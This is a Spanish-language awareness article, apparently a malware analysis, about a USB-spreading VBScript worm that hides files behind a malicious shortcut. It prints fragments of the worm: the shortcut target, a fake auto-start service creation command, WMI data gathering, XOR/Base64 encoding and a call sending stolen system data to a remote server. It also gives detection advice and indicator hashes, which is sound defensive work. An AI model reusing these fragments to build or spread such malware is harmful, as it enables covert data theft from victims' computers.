¿Amenaza invisible? Cómo tu USB pueden infectar tu computadora sin que lo notes.
Octubre 17 de 2025
Embedded Files
Introducción
Introducción
¿Alguna vez has conectado una memoria USB a tu computadora sin pensarlo dos veces? Lo que parece una acción cotidiana puede convertirse en el inicio de una infección silenciosa.
En este artículo te explicamos cómo funciona un tipo de malware que se propaga entre computadoras y memorias USB sin que el usuario lo note. No necesitas descargar nada de internet ni abrir archivos sospechosos: basta con insertar una USB infectada o usar una computadora ya comprometida para que el ciclo de infección comience.
A lo largo del texto te mostraremos cómo ocurre esta propagación, qué señales puedes detectar y cómo protegerte.
Infeccion
Infeccion
Imagina que te has encontrado una USB o que has ido aun Cybercafé y guardaste o descargaste alguna información en tu dispositivo extraíble, por lo tanto, llegas a casa o trabajo e insertas tu USB en tu computadora y al intentar identificar tus archivos solo observas una carpeta con el nombre Archivos (Archivos.lnk – acceso directo), por lo que te preguntas donde están mis documentos, esa carpeta no la recuerdo, y por curiosidad o saber dónde están tus documentos le das doble clic, sin embargo haz desatado la infección.
Fase 1
Ahora te preguntaras como es que esto es posible, pues la respuesta es que los actores maliciosos siempre encuentran la manera de abusar de las configuraciones y funciones predeterminadas del sistema, esto en el enfoque de la ciberseguridad lo llaman living off the land (LOTL). En este análisis observamos que abusan de los accesos directos es decir archivos con extensión .lnk. así que te doy una idea, cuando tu das doble clic sobre algún programa en tu escritorio este se ejecuta, pero es gracias a la configuración del archivo, si tú le das clic derecho y seleccionas la opción de propiedades y te sitúas sobre la pestaña acceso directo veras en los campos detalles e inicia en la ruta desde donde se ejecuta el programa que tienes instalado en el equipo. Pues los atacantes modifican esta ruta e ingresan lo que desean ejecutar, en este caso un archivo del tipo scritp es decir, una serie de instrucciones que el sistema interpreta y ejecuta automáticamente.
1.-El acceso directo está configurado así:
fake_lnk.TargetPath = "wscript.exe"
fake_lnk.Arguments = "Dark_Files\\Cthulhu.vbs The_call 30000"
Esto significa que el sistema ejecuta el script Cthulhu.vbs con el argumento "The_call", lo que activa una sección específica del código que inicia la infección.
2.- Copia el script al sistema
El script se copia desde la USB a una ruta oculta en el sistema, Esta ruta usa un GUID que simula una carpeta del sistema, dificultando su detección por usuarios y antivirus.
Dir_p_privileges = %ProgramFiles%\Windows\Panel.{ED7BA470-...}
Sistema_de_Archivos.CopyFile wscript.ScriptFullName, Dir_p_privileges & "\\Cthulhu.vbs"
3.- Instala un servicio persistente
El script genera un archivo .bat que crea un servicio falso llamado Urm_At_Tawill, configurado para ejecutarse automáticamente, Este servicio se disfraza como una tarea de mantenimiento, pero en realidad mantiene activo el malware en segundo plano.
sc Create Urm_At_Tawill DisplayName= "Registro de mantenimiento" BinPath= "cmd.exe /c Cthulhu.vbs Nightmares" start= auto
4.- Recolecta información del sistema
El script accede a componentes del sistema usando WMI (Windows Management Instrumentation) para obtener:
Nombre del equipo (%ComputerName%)
Usuario actual (%UserName%)
Sistema operativo (Win32_OperatingSystem)
Dominio (Win32_ComputerSystem)
Antivirus instalado (SecurityCenter o SecurityCenter2)
Esta información se guarda en archivos como Dreams, user, map, y luego se cifra.
5. Envía la información a internet
El script cifra los datos usando una técnica XOR con una frase codificada:
binary_char_data xor binary_char_key
Luego los convierte a Base64:
Base64Encode(cipher_data, False)
Y los envía a un servidor remoto mediante InternetExplorer.Application:
.Navigate "http://" & ip & "/Rlyeh/Servants/whisper_a_nightmare.php"
Fase 2
Una vez que el sistema está infectado, el script entra en modo de espera y escanea constantemente si se conecta una nueva memoria USB:
for each drive in Sistema_de_archivos.drives
if drive.drivetype = 1 then
``
Cuando detecta una unidad extraíble:
Crea una carpeta oculta Dark_Files en la raíz de la USB.
Mueve todos los archivos y carpetas del usuario a esa carpeta.
Copia el script Cthulhu.vbs a la USB.
Crea un nuevo acceso directo Archivos.lnk que apunta al script malicioso.
Este proceso se repite cada vez que se conecta una USB nueva, lo que permite que el malware se propague de forma silenciosa entre computadoras.
Ahora te preguntaras como puedo identificar esto si mi antivirus no lo detecta o en el peor de los casos, no tengo instalado alguno (ni uno pirata). En tu explorador de archivos puedes ver el contenido en forma de detalles y en el apartado de tipo de archivo si tu carpeta tiene un acceso directo es sumamente sospechoso, y lo mas seguro es que tus archivos estén ocultos, por lo que puedes activar esta opción y eliminar la carpeta o el objeto infectado.
IOC
89AF91CD188781990143916D585706B3
9B48FBD8141EFB90A4F2DCD862ADE2694EDB0B0D
CE4CDB2D768185936C11BA4EF30EB6EAD5F59046C0E5D5475831CEF3DAE80422
Fuentes
Un malware polimórfico distribuido vía memorias USB en México
The Spies Who Loved You: Infected USB Drives to Steal Secrets | Mandiant | Google Cloud Blog
Page updated
Google Sites
Report abuse